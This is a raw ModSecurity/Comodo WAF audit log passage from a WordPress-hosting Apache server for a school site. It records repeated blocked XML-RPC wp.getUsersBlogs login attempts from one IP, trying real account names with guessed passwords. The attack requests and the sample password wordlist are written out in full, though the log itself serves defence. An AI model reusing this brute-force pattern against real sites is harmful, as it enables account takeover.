271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285581354786 4841 (- - -) Stopwatch2: 1749285581354786 4841; combined=3870, p1=448, p2=3134, p3=0, p4=0, p5=159, sr=84, sw=129, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83dff571-Z-- --4db56304-A-- [07/Jun/2025:15:40:41 +0700] aEP7CRK9gc79coX6mHSN_AAAAEA 103.236.140.4 50186 103.236.140.4 8181 --4db56304-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4db56304-C-- wp.getUsersBlogs wakasarpras sparky --4db56304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db56304-E-- --4db56304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285641183309 5583 (- - -) Stopwatch2: 1749285641183309 5583; combined=4195, p1=511, p2=3509, p3=0, p4=0, p5=104, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db56304-Z-- --0a311a1b-A-- [07/Jun/2025:15:41:42 +0700] aEP7RvClubEPOra_8UkN1wAAABE 103.236.140.4 52060 103.236.140.4 8181 --0a311a1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0a311a1b-C-- wp.getUsersBlogs wakasarpras sunshine1 --0a311a1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a311a1b-E-- --0a311a1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285702192117 5465 (- - -) Stopwatch2: 1749285702192117 5465; combined=3838, p1=484, p2=3182, p3=0, p4=0, p5=101, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a311a1b-Z-- --4ca2b706-A-- [07/Jun/2025:15:42:42 +0700] aEP7gmCOO9DrcKL2J_79-gAAAMQ 103.236.140.4 53626 103.236.140.4 8181 --4ca2b706-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4ca2b706-C-- wp.getUsersBlogs wakasarpras manager --4ca2b706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ca2b706-E-- --4ca2b706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285762220833 5186 (- - -) Stopwatch2: 1749285762220833 5186; combined=3715, p1=462, p2=3084, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ca2b706-Z-- --f3599d3e-A-- [07/Jun/2025:15:43:42 +0700] aEP7vpANhDjQAvBdMyHfxgAAAII 103.236.140.4 55492 103.236.140.4 8181 --f3599d3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3599d3e-C-- wp.getUsersBlogs wakasarpras tottenham --f3599d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3599d3e-E-- --f3599d3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285822077747 5401 (- - -) Stopwatch2: 1749285822077747 5401; combined=3867, p1=468, p2=3217, p3=0, p4=0, p5=108, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3599d3e-Z-- --bdc3b924-A-- [07/Jun/2025:15:44:42 +0700] aEP7-pANhDjQAvBdMyHgPgAAAIg 103.236.140.4 57498 103.236.140.4 8181 --bdc3b924-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 235 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bdc3b924-C-- wp.getUsersBlogs wakasarpras smkn22-jkt-sch-id@ --bdc3b924-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc3b924-E-- --bdc3b924-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285882650249 5564 (- - -) Stopwatch2: 1749285882650249 5564; combined=4292, p1=493, p2=3604, p3=0, p4=0, p5=114, sr=89, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc3b924-Z-- --e9480803-A-- [07/Jun/2025:15:45:42 +0700] aEP8NpANhDjQAvBdMyHgwgAAAIY 103.236.140.4 59536 103.236.140.4 8181 --e9480803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e9480803-C-- wp.getUsersBlogs wakasarpras 2010 --e9480803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9480803-E-- --e9480803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (96+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285942321047 5325 (- - -) Stopwatch2: 1749285942321047 5325; combined=3606, p1=484, p2=2938, p3=0, p4=0, p5=107, sr=90, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9480803-Z-- --b96b8a29-A-- [07/Jun/2025:15:46:42 +0700] aEP8cpANhDjQAvBdMyHhPgAAAII 103.236.140.4 33450 103.236.140.4 8181 --b96b8a29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b96b8a29-C-- wp.getUsersBlogs wakasarpras domain --b96b8a29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b96b8a29-E-- --b96b8a29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286002147244 5358 (- - -) Stopwatch2: 1749286002147244 5358; combined=4226, p1=491, p2=3543, p3=0, p4=0, p5=112, sr=89, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b96b8a29-Z-- --30417b79-A-- [07/Jun/2025:15:47:38 +0700] aEP8qhK9gc79coX6mHSR8gAAAFA 103.236.140.4 35582 103.236.140.4 8181 --30417b79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30417b79-C-- wp.getUsersBlogs wakasarpras 1234%^&* --30417b79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30417b79-E-- --30417b79-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286058102813 5158 (- - -) Stopwatch2: 1749286058102813 5158; combined=3756, p1=452, p2=3122, p3=0, p4=0, p5=111, sr=83, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30417b79-Z-- --e2529953-A-- [07/Jun/2025:15:47:42 +0700] aEP8rpANhDjQAvBdMyHiBQAAAIs 103.236.140.4 35752 103.236.140.4 8181 --e2529953-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e2529953-C-- wp.getUsersBlogs wakasarpras qqqqqq --e2529953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2529953-E-- --e2529953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286062312968 5913 (- - -) Stopwatch2: 1749286062312968 5913; combined=4371, p1=532, p2=3633, p3=0, p4=0, p5=122, sr=125, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2529953-Z-- --a8624c75-A-- [07/Jun/2025:15:48:42 +0700] aEP86hK9gc79coX6mHSSrgAAAE0 103.236.140.4 37918 103.236.140.4 8181 --a8624c75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8624c75-C-- wp.getUsersBlogs wakasarpras anthony --a8624c75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8624c75-E-- --a8624c75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286122136938 5532 (- - -) Stopwatch2: 1749286122136938 5532; combined=3895, p1=530, p2=3192, p3=0, p4=0, p5=102, sr=123, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8624c75-Z-- --43ba6c03-A-- [07/Jun/2025:15:49:46 +0700] aEP9KvClubEPOra_8UkSIgAAAAw 103.236.140.4 39782 103.236.140.4 8181 --43ba6c03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --43ba6c03-C-- wp.getUsersBlogs wakasarpras qqww1122 --43ba6c03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43ba6c03-E-- --43ba6c03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286186906531 5683 (- - -) Stopwatch2: 1749286186906531 5683; combined=3970, p1=484, p2=3298, p3=0, p4=0, p5=109, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ba6c03-Z-- --40a24409-A-- [07/Jun/2025:15:50:48 +0700] aEP9aGCOO9DrcKL2J_4BpgAAANI 103.236.140.4 41218 103.236.140.4 8181 --40a24409-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --40a24409-C-- wp.getUsersBlogs kasubagtu smkn22-jkt.sch.id --40a24409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40a24409-E-- --40a24409-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286248103438 5611 (- - -) Stopwatch2: 1749286248103438 5611; combined=4348, p1=461, p2=3684, p3=0, p4=0, p5=117, sr=86, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40a24409-Z-- --12910b1d-A-- [07/Jun/2025:15:51:48 +0700] aEP9pGCOO9DrcKL2J_4CSQAAAMs 103.236.140.4 42918 103.236.140.4 8181 --12910b1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --12910b1d-C-- wp.getUsersBlogs kasubagtu kasubagtupwd --12910b1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12910b1d-E-- --12910b1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286308395481 4685 (- - -) Stopwatch2: 1749286308395481 4685; combined=3329, p1=419, p2=2773, p3=0, p4=0, p5=80, sr=75, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12910b1d-Z-- --2e1a353e-A-- [07/Jun/2025:15:52:48 +0700] aEP94JANhDjQAvBdMyHkSgAAAI0 103.236.140.4 44380 103.236.140.4 8181 --2e1a353e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2e1a353e-C-- wp.getUsersBlogs kasubagtu Graphics123! --2e1a353e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e1a353e-E-- --2e1a353e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286368112996 5762 (- - -) Stopwatch2: 1749286368112996 5762; combined=3987, p1=504, p2=3289, p3=0, p4=0, p5=117, sr=90, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e1a353e-Z-- --5f738644-A-- [07/Jun/2025:15:53:48 +0700] aEP-HBK9gc79coX6mHSUdAAAAFA 103.236.140.4 45970 103.236.140.4 8181 --5f738644-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5f738644-C-- wp.getUsersBlogs kasubagtu marketing2012_ --5f738644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f738644-E-- --5f738644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286428372019 5583 (- - -) Stopwatch2: 1749286428372019 5583; combined=4019, p1=509, p2=3257, p3=0, p4=0, p5=143, sr=88, sw=110, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f738644-Z-- --5637c933-A-- [07/Jun/2025:15:54:48 +0700] aEP-WBK9gc79coX6mHSUpgAAAFQ 103.236.140.4 47876 103.236.140.4 8181 --5637c933-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5637c933-C-- wp.getUsersBlogs kasubagtu bonnie --5637c933-F-- HTTP/1.1 403 